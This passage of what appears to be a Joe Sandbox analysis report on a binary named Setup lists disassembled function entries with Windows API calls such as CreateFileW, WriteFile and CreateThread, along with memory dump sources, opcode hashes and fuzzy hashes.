                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              • Opcode ID: cb10ce9d203d8845025bedbe5157d920dfdab03af514b58c37b7751f38b46d6e
                                                              • Instruction ID: 6014f80eca2cef2230fff530fbea32a999f758f70d3bb3ef97883d658b42569f
                                                              • Opcode Fuzzy Hash: cb10ce9d203d8845025bedbe5157d920dfdab03af514b58c37b7751f38b46d6e
                                                              • Instruction Fuzzy Hash: 3F11AD7615090ACFCB21CFA6C48098FF3B5BFA4318B214659D0A5D7E94CB34F58ADBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 4d8f2ef6dabce137de04b91bcc2c8d1c4e5205d963a24a7406cc2a2206d514d0
                                                              • Instruction ID: 3b7a46a50a7191802fb7a0bc2688ffcfb7e1214b3c878e55ca31ade79dbcfb73
                                                              • Opcode Fuzzy Hash: 4d8f2ef6dabce137de04b91bcc2c8d1c4e5205d963a24a7406cc2a2206d514d0
                                                              • Instruction Fuzzy Hash: D6115EB0A05218EFCB00DFA8C88599DBBB9AF18714B20C559F519DBB54C730DA05CBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memcpy_s
                                                              • String ID:
                                                              • API String ID: 2001391462-0
                                                              • Opcode ID: 418c8faa8bb17f4116f65aeaec1898627a1780b09b30d3fe84bd4296820e32b2
                                                              • Instruction ID: 7f310ef706b6010c62ab9bfdd873c6f3e8508804fb2d6cf52ae97a02749ccd57
                                                              • Opcode Fuzzy Hash: 418c8faa8bb17f4116f65aeaec1898627a1780b09b30d3fe84bd4296820e32b2
                                                              • Instruction Fuzzy Hash: 8D017C76200204AFD710DF99C884C9AB7F9FF99354711456AF915CB750D770ED04CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 7068a6b87ade7b99610c3dba9bab7fbf48d5a41ae48da4a9ff838282b8254959
                                                              • Instruction ID: c374479f89da7565dc71775c44a52655b11471b362405a8c3b1900f0793ca881
                                                              • Opcode Fuzzy Hash: 7068a6b87ade7b99610c3dba9bab7fbf48d5a41ae48da4a9ff838282b8254959
                                                              • Instruction Fuzzy Hash: 15116970605209ABDB08EF68C955A9E777ABF55324F208158F829DFBC0CB31EE15CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              • Opcode ID: 834a7115306312e24cad7a49fd19d208491d4c55780ad566babb64948e27b85a
                                                              • Instruction ID: fc3bf60b9a9bdc2170773cc926fc0d652d1d06012797cf21f59d7be205f19541
                                                              • Opcode Fuzzy Hash: 834a7115306312e24cad7a49fd19d208491d4c55780ad566babb64948e27b85a
                                                              • Instruction Fuzzy Hash: 60F06274B15349EFDB10CF68C905B8D3B65AF59364F208558B818DB790CB71DE15CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileW.KERNEL32(?,?,?,?,00000000,?,00000000,00000001,?,6C91A9FA,?,80000000,00000001,00000003,00000080,00000000), ref: 6C9180D7
                                                                • Part of subcall function 6C9689E2: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C9180C1,?,?,?,?,00000000,?,00000001,?,6C91A9FA,?,80000000,00000001), ref: 6C9689F3
                                                                • Part of subcall function 6C9689E2: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6C968A03
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressCreateFileHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 2580138172-0
                                                              • Opcode ID: bc4256c6dfb585e5df72ef7c1cad4f246192c9208edbd3e63d6fbc8393aafed0
                                                              • Instruction ID: 9bc068ced6f561e55402be2364640da2ab76fc0b0b8c1cb6a6e34117c5143272
                                                              • Opcode Fuzzy Hash: bc4256c6dfb585e5df72ef7c1cad4f246192c9208edbd3e63d6fbc8393aafed0
                                                              • Instruction Fuzzy Hash: D0F09D3200410EFBCF165E95DC06DCA3F26EF29364F128212FA24569A0C332D971FB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileW.KERNEL32(00002100,00000002,00000000,6C4A7BC3,C0000000,?,00000000,?,?,6C4A7BC3,?,C0000000,00000000,00000002,00002100,?), ref: 6C4A7F5C
                                                                • Part of subcall function 6C4A7E95: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C4A7F46,00002100,00000002,00000000,6C4A7BC3,C0000000,?,?,?,6C4A7BC3,?,C0000000,00000000), ref: 6C4A7EA6
                                                                • Part of subcall function 6C4A7E95: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6C4A7EB6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressCreateFileHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 2580138172-0
                                                              • Opcode ID: 48462e33ef5dfc7b9dfb37f74dcf1ca7df5264ba29b09c65a7232903818b8397
                                                              • Instruction ID: 2616f7fc4ded7a913d69c2166983403265f90f492ec2a81b1ea91eb2934fe71a
                                                              • Opcode Fuzzy Hash: 48462e33ef5dfc7b9dfb37f74dcf1ca7df5264ba29b09c65a7232903818b8397
                                                              • Instruction Fuzzy Hash: DFF0A43254814ABBCF129FD4DC00ECA7F76AF2D360F108115FA2455A68C332D972EB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              • Opcode ID: c60aace957820a154790429e4319fb95c74e65e6a88875086d238cc7dbb6a70d
                                                              • Instruction ID: daf1a813da96922aaa326145640158dc1d3656cb8aa8bccc21cf781b5928bd72
                                                              • Opcode Fuzzy Hash: c60aace957820a154790429e4319fb95c74e65e6a88875086d238cc7dbb6a70d
                                                              • Instruction Fuzzy Hash: 8BF06D30601209EFDB10CF68C905B9D3BA5AF15368F258158B809EF780CB31EE00CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 6f2903bdc07b29cd62c869f8f4a0a7c7ff1e56d53a5173e2b02d1f0eb36eff03
                                                              • Instruction ID: ef499a06cffab7a530cacf4502e97d9f4a8184bc0395abb54a84b86d1a492456
                                                              • Opcode Fuzzy Hash: 6f2903bdc07b29cd62c869f8f4a0a7c7ff1e56d53a5173e2b02d1f0eb36eff03
                                                              • Instruction Fuzzy Hash: 02F0BE31A011499ACF118BF4C5103ECBB656F3230DF10C05094643BBA1C735E62DD7A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C94FFA8: _memcpy_s.LIBCMT ref: 6C94FFCE
                                                                • Part of subcall function 6C94FFA8: _memcpy_s.LIBCMT ref: 6C94FFDE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memcpy_s$H_prolog3
                                                              • String ID:
                                                              • API String ID: 1888667434-0
                                                              • Opcode ID: a0e855cc702f4a3fb89a9f8470895e729f7ed0d8fb16331475af1fb834faedf7
                                                              • Instruction ID: 814171eb408ad303c1526e9cffa1558276fad377ad6640f0618175ddd12afe78
                                                              • Opcode Fuzzy Hash: a0e855cc702f4a3fb89a9f8470895e729f7ed0d8fb16331475af1fb834faedf7
                                                              • Instruction Fuzzy Hash: 9DF0F874A01209AFDF00DFA9C9805DDB7A0BF28718F408456E918EBB40C775DA28CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C917C75
                                                                • Part of subcall function 6C917CE8: __EH_prolog3.LIBCMT ref: 6C917CEF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 193b7ecfcf1dc994a4e500a264a1403b962ae28319cbf739dd52a892f4893f63
                                                              • Instruction ID: 567a1af38e479ffa1cc51b7f17c825ecef5eeabb4ca49304cb80dfd7b38b9ee7
                                                              • Opcode Fuzzy Hash: 193b7ecfcf1dc994a4e500a264a1403b962ae28319cbf739dd52a892f4893f63
                                                              • Instruction Fuzzy Hash: 93F01DB0701A03AAD74CDF3885413E9F6A1BF68308F40463E902DEBB41CB31A828CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C948C81
                                                                • Part of subcall function 6C94FFA8: _memcpy_s.LIBCMT ref: 6C94FFCE
                                                                • Part of subcall function 6C94FFA8: _memcpy_s.LIBCMT ref: 6C94FFDE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memcpy_s$H_prolog3
                                                              • String ID:
                                                              • API String ID: 1888667434-0
                                                              • Opcode ID: c65892b302773f70c42f1c69b0142ef7ace976f89256613c5ccff907da44c07a
                                                              • Instruction ID: a87422692fa303054fc3d0d6de44f91571396dd082b038a64d0ab326a2fcf0b7
                                                              • Opcode Fuzzy Hash: c65892b302773f70c42f1c69b0142ef7ace976f89256613c5ccff907da44c07a
                                                              • Instruction Fuzzy Hash: 8AF01274A012059BDF10DF99C5405CDBB60BF24718F448455E918AB740C775DA28CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SendMessageW.USER32(00000000,0000044A,00000002,?), ref: 6C490F06
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 5630b41884fbf5f3e575d27ed605f133e83ca011ec76a5be271c303935813cec
                                                              • Instruction ID: 389ae60b5caf3b79aaa0382f28237b70d29fb83f16ebd822c3d27410ff0d4080
                                                              • Opcode Fuzzy Hash: 5630b41884fbf5f3e575d27ed605f133e83ca011ec76a5be271c303935813cec
                                                              • Instruction Fuzzy Hash: 9BF0C9B690020CBBDB11DF98C846FDEFBF9BB58300F108166E615B7250D77096058B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9139B4
                                                                • Part of subcall function 6C968DCD: _vwprintf.LIBCMT ref: 6C968E13
                                                                • Part of subcall function 6C968DCD: _vswprintf_s.LIBCMT ref: 6C968E38
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_vswprintf_s_vwprintf
                                                              • String ID:
                                                              • API String ID: 3682816334-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,6C91AA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 6C918149
                                                                • Part of subcall function 6C9689C8: GetLastError.KERNEL32(6C9180E8,6C91A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9689C8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,?,00000006,?,?,?,?,6C48DAC1,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 6C4A7E76
                                                                • Part of subcall function 6C4A7F08: GetLastError.KERNEL32(6C4A7B0B,?,?,?,00000000), ref: 6C4A7F08
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C48B945
                                                                • Part of subcall function 6C4A830D: _vwprintf.LIBCMT ref: 6C4A8353
                                                                • Part of subcall function 6C4A830D: _vswprintf_s.LIBCMT ref: 6C4A8378
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_vswprintf_s_vwprintf
                                                              • String ID:
                                                              • API String ID: 3682816334-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C913965
                                                                • Part of subcall function 6C948C24: __EH_prolog3.LIBCMT ref: 6C948C2B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C913924
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,6C9460F1), ref: 6C91810D
                                                                • Part of subcall function 6C9689C8: GetLastError.KERNEL32(6C9180E8,6C91A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9689C8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C948387
                                                                • Part of subcall function 6C9484FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,6C94FA6E,02642228,?,?,6C9483B3,02642228,6C90A794,02642228,6C90A794,00000000), ref: 6C94851E
                                                                • Part of subcall function 6C9484FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,6C94FA6E,02642228,?,?,6C9483B3,02642228,6C90A794,02642228,6C90A794), ref: 6C94853F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$H_prolog3
                                                              • String ID:
                                                              • API String ID: 692526729-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00000000,6C9623E8,?,00000000,00000000), ref: 6C95D729
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C49E4BE
                                                                • Part of subcall function 6C49E104: __EH_prolog3_catch.LIBCMT ref: 6C49E10B
                                                                • Part of subcall function 6C49E75F: __EH_prolog3.LIBCMT ref: 6C49E766
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch$H_prolog3
                                                              • String ID:
                                                              • API String ID: 3796446187-0
                                                              • Opcode ID: 8fec60ba670addfb13413f3f41dcd8162bebba3f96d2bd87ff135463b5f422f6
                                                              • Instruction ID: 140923a78943314bf1d051454b71e51174f5d65cdcd5e706305137c8e25a26e7
                                                              • Opcode Fuzzy Hash: 8fec60ba670addfb13413f3f41dcd8162bebba3f96d2bd87ff135463b5f422f6
